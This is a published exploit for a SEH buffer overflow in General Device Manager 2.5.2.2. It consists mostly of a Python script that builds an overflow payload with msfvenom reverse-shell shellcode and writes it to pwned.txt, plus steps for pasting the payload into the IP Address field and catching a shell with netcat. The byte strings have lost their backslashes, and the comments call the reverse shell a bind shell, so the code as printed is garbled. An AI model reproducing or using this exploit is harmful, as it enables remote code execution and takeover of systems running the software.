Authored by Ahmet Umit Bayram

General Device Manager version 2.5.2.2 suffers from a buffer overflow vulnerability.

# Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
# Date: 30.07.2023
# Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
# Software Link 2:
https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
# Exploit Author: Ahmet Ãœmit BAYRAM
# Tested Version: 2.5.2.2
# Tested on: Windows 10 64bit

# 1.- Run python code : exploit.py
# 2.- Open pwned.txt and copy all content to clipboard
# 3.- Open Device Manage and press Add Device
# 4.- Paste the content of pwned.txt into the 'IP Address'
# 5.- Click 'OK'
# 6.- nc.exe local IP Port 1337 and you will have a bind shell
# 7.- R.I.P. Condor <3

import struct

offset = b"A" * 1308

nseh = b"xEBx06x90x90" # jmp short

seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:Program Files (x86)DeviceManageNetSDK.dll)


nops = b"x90" * 32 

#shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1  LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "x00x0ax0d" -f python --var-name shellcode

shellcode =  b""
shellcode += b"xd9xc6xbbxaexc7xedx8exd9x74x24xf4"
shellcode += b"x5ax29xc9xb1x52x83xeaxfcx31x5ax13"
shellcode += b"x03xf4xd4x0fx7bxf4x33x4dx84x04xc4"
shellcode += b"x32x0cxe1xf5x72x6ax62xa5x42xf8x26"
shellcode += b"x4ax28xacxd2xd9x5cx79xd5x6axeax5f"
shellcode += b"xd8x6bx47xa3x7bxe8x9axf0x5bxd1x54"
shellcode += b"x05x9ax16x88xe4xcexcfxc6x5bxfex64"
shellcode += b"x92x67x75x36x32xe0x6ax8fx35xc1x3d"
shellcode += b"x9bx6fxc1xbcx48x04x48xa6x8dx21x02"
shellcode += b"x5dx65xddx95xb7xb7x1ex39xf6x77xed"
shellcode += b"x43x3fxbfx0ex36x49xc3xb3x41x8exb9"
shellcode += b"x6fxc7x14x19xfbx7fxf0x9bx28x19x73"
shellcode += b"x97x85x6dxdbxb4x18xa1x50xc0x91x44"
shellcode += b"xb6x40xe1x62x12x08xb1x0bx03xf4x14"
shellcode += b"x33x53x57xc8x91x18x7ax1dxa8x43x13"
shellcode += b"xd2x81x7bxe3x7cx91x08xd1x23x09x86"
shellcode += b"x59xabx97x51x9dx86x60xcdx60x29x91"
shellcode += b"xc4xa6x7dxc1x7ex0exfex8ax7exafx2b"
shellcode += b"x1cx2ex1fx84xddx9exdfx74xb6xf4xef"
shellcode += b"xabxa6xf7x25xc4x4dx02xaex94x91x0c"
shellcode += b"x2fx03x90x0cx2axeax1dxeax5ex1cx48"
shellcode += b"xa5xf6x85xd1x3dx66x49xccx38xa8xc1"
shellcode += b"xe3xbdx67x22x89xadx10xc2xc4x8fxb7"
shellcode += b"xddxf2xa7x54x4fx99x37x12x6cx36x60"
shellcode += b"x73x42x4fxe4x69xfdxf9x1ax70x9bxc2"
shellcode += b"x9exafx58xccx1fx3dxe4xeax0fxfbxe5"
shellcode += b"xb6x7bx53xb0x60xd5x15x6axc3x8fxcf"
shellcode += b"xc1x8dx47x89x29x0ex11x96x67xf8xfd"
shellcode += b"x27xdexbdx02x87xb6x49x7bxf5x26xb5"
shellcode += b"x56xbdx47x54x72xc8xefxc1x17x71x72"
shellcode += b"xf2xc2xb6x8bx71xe6x46x68x69x83x43"
shellcode += b"x34x2dx78x3ex25xd8x7exedx46xc9"


final_payload = offset + nseh + seh + nops + shellcode

# write the final payload to a file
try:
    with open('pwned.txt', 'wb') as f:
        print("[+] Creating %s bytes evil payload..." %len(final_payload))
        f.write(final_payload)
        f.close()
        print("[+] File created!")
except:
    print("File cannot be created!")

RELATED ARTICLESMORE FROM AUTHOR